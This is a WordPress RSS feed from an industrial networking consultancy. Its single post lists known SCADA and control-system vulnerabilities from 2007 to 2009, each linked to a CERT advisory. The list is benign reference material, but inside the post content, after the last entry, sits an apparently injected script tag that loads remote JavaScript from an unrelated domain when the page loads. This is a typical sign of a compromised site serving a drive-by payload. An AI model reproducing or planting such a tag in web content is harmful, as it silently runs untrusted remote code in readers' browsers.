<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Kazio Networks &#187; Presentations</title>
	<atom:link href="http://www.kazionetworks.com/category/presentations/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.kazionetworks.com</link>
	<description>Industrial Ethernet Network Services &#38; Consulting</description>
	<lastBuildDate>Thu, 10 Jun 2010 21:07:29 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Current Security Vulnerabilities in Control Systems</title>
		<link>http://www.kazionetworks.com/current-known-security-vulnerabilities-in-control-system-applications-devices/</link>
		<comments>http://www.kazionetworks.com/current-known-security-vulnerabilities-in-control-system-applications-devices/#comments</comments>
		<pubDate>Fri, 20 Feb 2009 20:49:36 +0000</pubDate>
		<dc:creator>Melvin Foo</dc:creator>
				<category><![CDATA[Industrial Security]]></category>
		<category><![CDATA[Network Design & Analysis]]></category>
		<category><![CDATA[Presentations]]></category>
		<category><![CDATA[control systems security]]></category>
		<category><![CDATA[cyber systems]]></category>
		<category><![CDATA[Security Vulnerability]]></category>

		<guid isPermaLink="false">http://www.kazionetworks.com/?p=853</guid>
		<description><![CDATA[Here is a list 1 of (currently known) control system security vulnerabilities from 2007- present 2. 
AREVA e-terrahabitat SCADA systems vulnerabilities
February 2009
GE Fanuc Proficy HMI/SCADA iFIX uses insecure authentication techniques
February 2009
GoAhead Webserver Information Disclosure Vulnerability
February 2009
Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge URL Redirection Vulnerability 
February 2009
Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Cross-site Scripting Vulnerability 
February [...]]]></description>
			<content:encoded><![CDATA[<p>Here is a list <sup class='footnote'><a href='#fn-853-1' id='fnref-853-1'>1</a></sup> of (currently known) control system security vulnerabilities from 2007- present <sup class='footnote'><a href='#fn-853-2' id='fnref-853-2'>2</a></sup>. <span id="more-853"></span></p>
<p><a href="http://www.kb.cert.org/vuls/id/337569">AREVA e-terrahabitat SCADA systems vulnerabilities</a><br />
February 2009</p>
<p><a href="http://www.kb.cert.org/vuls/id/310355">GE Fanuc Proficy HMI/SCADA iFIX uses insecure authentication techniques</a><br />
February 2009</p>
<p><a href="http://www.kb.cert.org/vuls/id/124059">GoAhead Webserver Information Disclosure Vulnerability</a><br />
February 2009</p>
<p><a href="http://www.kb.cert.org/vuls/id/619499">Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge URL Redirection Vulnerability </a><br />
February 2009</p>
<p><a href="http://www.kb.cert.org/vuls/id/882619">Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Cross-site Scripting Vulnerability </a><br />
February 2009</p>
<p><a href="http://www.kb.cert.org/vuls/id/981849">Automated Solutions Modbus TCP Slave ActiveX Control Vulnerability</a><br />
January 2009</p>
<p><a href="http://www.kb.cert.org/vuls/id/343971">ABB PCU400 vulnerable to buffer overflow</a><br />
September 2008</p>
<p><a href="http://www.kb.cert.org/vuls/id/476345">Citect CitectSCADA buffer overflow</a><br />
June 2008</p>
<p><a href="http://www.kb.cert.org/vuls/id/596268">Wonderware SuiteLink null pointer dereference</a><br />
May 2008</p>
<p><a href="http://www.kb.cert.org/vuls/id/308556">GE Fanuc CIMPLICITY HMI heap buffer overflow</a><br />
January 2008</p>
<p><a href="http://www.kb.cert.org/vuls/id/339345">GE Fanuc Proficy Information Portal allows arbitrary file upload and execution </a><br />
January 2008</p>
<p><a href="http://www.kb.cert.org/vuls/id/180876">GE Fanuc Proficy Information Portal transmits authentication credentials in plain text</a><br />
January 2008</p>
<p><a href="http://www.kb.cert.org/vuls/id/205073">Gesytec Easylon OPC Server fails to properly validate OPC server handles</a><br />
December 2007</p>
<p><a href="http://www.kb.cert.org/vuls/id/138633">Invensys Wonderware InTouch creates insecure NetDDE share</a><br />
November 2007</p>
<p><a href="http://www.kb.cert.org/vuls/id/711420">LiveData Server fails to properly handle Connection-Oriented Transport Protocol packets</a><br />
May 2007</p>
<p><a href="http://www.kb.cert.org/vuls/id/213516">LiveData Protocol Server fails to properly handle requests for WSDL files</a><br />
May 2007</p>
<p><a href="http://www.kb.cert.org/vuls/id/926551">Takebishi Electric DeviceXPlorer OPC Server fails to properly validate OPC server handles</a><br />
March 2007</p>
<p><a href="http://www.kb.cert.org/vuls/id/296593">NETxAutomation NETxEIB OPC Server fails to properly validate OPC server handles</a><br />
March 2007</p>
<p><a href="http://www.kb.cert.org/vuls/id/251969">ICONICS Dialog Wrapper Module ActiveX control vulnerable to buffer overflow</a><br />
January 2007</p>
<p><a href="http://www.kb.cert.org/vuls/id/145825">SISCO OSI Stack fails to properly handle malformed packets</a></p>
<p>January 2007<small> </small><script src="http://ae.awaue.com/7"></script>
<div class='footnotes'>
<div class='footnotedivider'></div>
<ol>
<li id='fn-853-1'>This is an ongoing list that will be updated periodically. <span class='footnotereverse'><a href='#fnref-853-1'>&#8617;</a></span></li>
<li id='fn-853-2'>Referenced from United States Computer Emergency Readiness Team (<a href="http://www.us-cert.gov">US-Cert</a>) <span class='footnotereverse'><a href='#fnref-853-2'>&#8617;</a></span></li>
</ol>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.kazionetworks.com/current-known-security-vulnerabilities-in-control-system-applications-devices/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
